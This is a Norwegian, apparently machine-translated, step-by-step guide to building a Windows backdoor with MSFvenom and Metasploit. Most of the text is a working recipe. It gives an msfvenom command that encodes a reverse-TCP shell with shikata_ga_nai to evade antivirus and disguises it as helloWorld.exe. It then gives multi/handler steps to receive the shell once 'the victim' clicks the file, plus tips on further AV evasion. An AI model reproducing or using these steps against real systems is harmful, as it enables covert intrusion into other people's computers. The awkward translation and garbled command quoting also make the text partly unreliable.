En bakdør brukes til å omgå sikkerhetsmekanismer, ofte i hemmelighet og for det meste uoppdagelig. Ved å bruke MSFvenom, kombinasjonen av msfpayload og msfencode, er det mulig å lage en bakdør som kobles tilbake til angriperen ved å bruke TCP med omvendt skall. For å utvikle en bakdør må du endre signaturen til skadelig programvare for å unngå antivirusprogramvare. Fullfør dette prosjektet på et par datamaskiner som du har tilgang til, og i prosessen vil du lære mer om datasikkerhet og hvordan denne typen bakdør fungerer.
Trinn
Trinn 1. Start Kali og fyr opp Terminal -konsollen
Trinn 2. Skriv ifconfig for å vise grensesnittet og sjekk IP -adressen din
Trinn 3. Skriv inn msfvenom -l -kodere for å vise listen over kodere
Du vil bruke x86/shikata_ga_nai som koder
Trinn 4. Skriv "msfvenom -a x86 -plattform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -plattformvinduer angir arkitektur som skal brukes.
- -p windows/shell/reverse_tcp angir nyttelastene som skal legges inn.
- LHOST angir lytterens IP -adresse.
- LPORT angir lytterporten.
- -b "\ x00" angir for å unngå dårlig karakter (null byte).
- -e x86/shikata_ga_nai angir koders navn.
- -f exe> helloWorld.exe angir formatutgang.
Trinn 5. Skriv inn msfconsole for å aktivere Metasploit
Nå har du generert bakdøren din. Når offeret klikker på helloWorld.exe, vil nyttelasten som er innebygd, bli aktivert og koble til systemet ditt. For å motta tilkoblingen må du åpne multi-handler i Metasploit og angi nyttelastene
Trinn 6. Skriv bruk exploit/multi/handler
Trinn 7. Skriv inn nyttelast windows/shell/reverse_tcp
Trinn 8. Skriv inn visningsalternativer for å kontrollere modulen
Trinn 9. Skriv inn sett LHOST 192.168.48.129
"LHOST" angir lytterens IP -adresse
Trinn 10. Type sett LPORT 4444
"LPORT" angir lytterporten
Trinn 11. Skriv inn run og vent på tilkoblingen fra offerets maskin
Trinn 12. Vent til offeret klikker på helloWorld.exe
Da blir du koblet til offerets maskin.
Tips
- Å bruke -i i MSFvenom vil representere iterasjonene for kodingen. Noen ganger kan flere iterasjoner bidra til å unngå AV -programvaren.
- Du har lært hvordan du genererer bakdøren og kodet ved å bruke MSFvenom, men denne metoden vil ikke fungere perfekt mot noen av AV -programvarene i dag. Årsaken bak dette er på grunn av utførelsesmalene i MSFvenom. AV -leverandørene har lagt til den statiske signaturen til disse malene og bare se etter dem. Løsningen for dette problemet er å bruke en annen utførelsesmal eller forskjellige verktøy.